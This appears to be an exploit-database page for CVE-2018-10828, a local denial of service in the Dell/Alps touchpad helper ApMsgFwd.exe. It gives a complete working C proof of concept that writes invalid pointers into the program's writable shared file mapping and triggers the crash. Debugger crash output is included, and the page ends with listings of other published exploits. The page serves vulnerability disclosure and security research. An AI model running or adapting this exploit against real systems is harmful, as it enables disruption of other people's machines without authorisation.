Menu

Search for hundreds of thousands of exploits

"Dell Touchpad - 'ApMsgFwd.exe' Denial of Service"

Author

Exploit author

"Souhail Hammou"

Platform

Exploit platform

windows

Release date

Exploit published date

2018-05-10

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
/*
Title: Dell Touchpad - ApMsgFwd.exe Denial Of Service
Author: Souhail Hammou
Vendor Homepage: https://www.alps.com/
Tested on : Alps Pointing-device Driver 10.1.101.207
CVE: CVE-2018-10828
*/

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

/*
Details:
==========
ApMsgFwd.exe belonging to Dell Touchpad, ALPS Touchpad driver, ALPS pointing-device for VAIO, Thinkpad Ultranav Driver ..etc 
allows the current user to map and write to the "ApMsgFwd File Mapping Object" section. 
ApMsgFwd.exe uses the data written to the section as arguments to functions. 
This causes a denial of service condition when invalid pointers are written to the mapped section. 

The crash :
===========
(b88.aa0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
KERNELBASE!MultiByteToWideChar+0x3d8:
00007ffc`06422e08 443830          cmp     byte ptr [rax],r14b ds:d05d05d0`5d05d05d=??
0:004> r
rax=d05d05d05d05d05d rbx=00000000000004e4 rcx=000000007fffffff
rdx=0000000000000000 rsi=00000000ffffffff rdi=d05d05d05d05d05d
rip=00007ffc06422e08 rsp=000000000272fae0 rbp=000000000272fb59
 r8=0000000000000000  r9=00000000ffffffff r10=0000000000000000
r11=000000000272fbc0 r12=00000000000001f4 r13=0000000000000000
r14=0000000000000000 r15=0000000000563e40
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
KERNELBASE!MultiByteToWideChar+0x3d8:
00007ffc`06422e08 443830          cmp     byte ptr [rax],r14b ds:d05d05d0`5d05d05d=??


0:001> lm v m ApMsgFwd
Browse full module list
start             end                 module name
00000000`00400000 00000000`00415000   ApMsgFwd   (no symbols)
    Loaded symbol image file: C:\Program Files\DellTPad\ApMsgFwd.exe
    Image path: C:\Program Files\DellTPad\ApMsgFwd.exe
    Image name: ApMsgFwd.exe
    Browse all global symbols  functions  data
    Timestamp:        Tue Jul  1 09:03:05 2014 (53B27949)
    CheckSum:         00020F5D
    ImageSize:        00015000
    File version:     8.1.0.44
    Product version:  8.1.0.44
    File flags:       0 (Mask 3F)
    File OS:          40004 NT Win32
    File type:        1.0 App
    File date:        00000000.00000000
    Translations:     0411.04b0
    CompanyName:      Alps Electric Co., Ltd.
    ProductName:      ApMsgFwd
    InternalName:     ApMsgFwd
    OriginalFilename: ApMsgFwd.exe
    ProductVersion:   8, 1, 0, 44
    FileVersion:      8, 1, 0, 44
    PrivateBuild:     8, 1, 0, 44
    SpecialBuild:     8, 1, 0, 44
    FileDescription:  ApMsgFwd
    LegalCopyright:   Copyright (C) 2006-2014 Alps Electric Co., Ltd.
    LegalTrademarks:  Copyright (C) 2006-2014 Alps Electric Co., Ltd.
    Comments:         Copyright (C) 2006-2014 Alps Electric Co., Ltd.
*/
int main(int argc, char** argv)
{
    HANDLE ApMpHnd,StartEvtHnd,KeyHnd;
    PBYTE MappedBuf;

    if ( ! (ApMpHnd = OpenFileMappingA(FILE_MAP_WRITE,FALSE,"ApMsgFwd File Mapping Object") ) )
    {
        printf("OpenFileMapping Failed !\n");
        goto ret;
    }

    if ( ! ( MappedBuf = MapViewOfFile(ApMpHnd,FILE_MAP_WRITE,0,0,0x1A0) ) )
    {
        printf("MapViewOfFile Failed !\n");
        goto cleanup_0;
    }

    StartEvtHnd = OpenEventA(EVENT_MODIFY_STATE,FALSE,"ApMsgFwd Event Start");

    if ( ! StartEvtHnd )
    {
        printf("OpenEvent Failed !\n");
        goto cleanup_1;
    }

    ZeroMemory(MappedBuf,0x1A0);
    *MappedBuf = 9; //switch case 9
    *(DWORD*)(MappedBuf + 0x60) = 0x5D05D05D;
    *(DWORD*)(MappedBuf + 0x64) = 0xD05D05D0;

    /*Wake up the waiting thread*/
    SetEvent(StartEvtHnd);
    
    CloseHandle(StartEvtHnd);
cleanup_1:
    UnmapViewOfFile(MappedBuf);
cleanup_0:
    CloseHandle(ApMpHnd);
ret:
    return 0;
}
Release Date Title Type Platform Author
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
Release Date Title Type Platform Author
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2018-05-10 "Dell Touchpad - 'ApMsgFwd.exe' Denial of Service" dos windows "Souhail Hammou"
2018-02-22 "Armadito Antivirus 0.12.7.2 - Detection Bypass" local windows "Souhail Hammou"
2018-02-07 "MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation" local windows "Souhail Hammou"
2018-02-05 "MalwareFox AntiMalware 2.74.0.150 - Local Privilege Escalation" local windows "Souhail Hammou" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected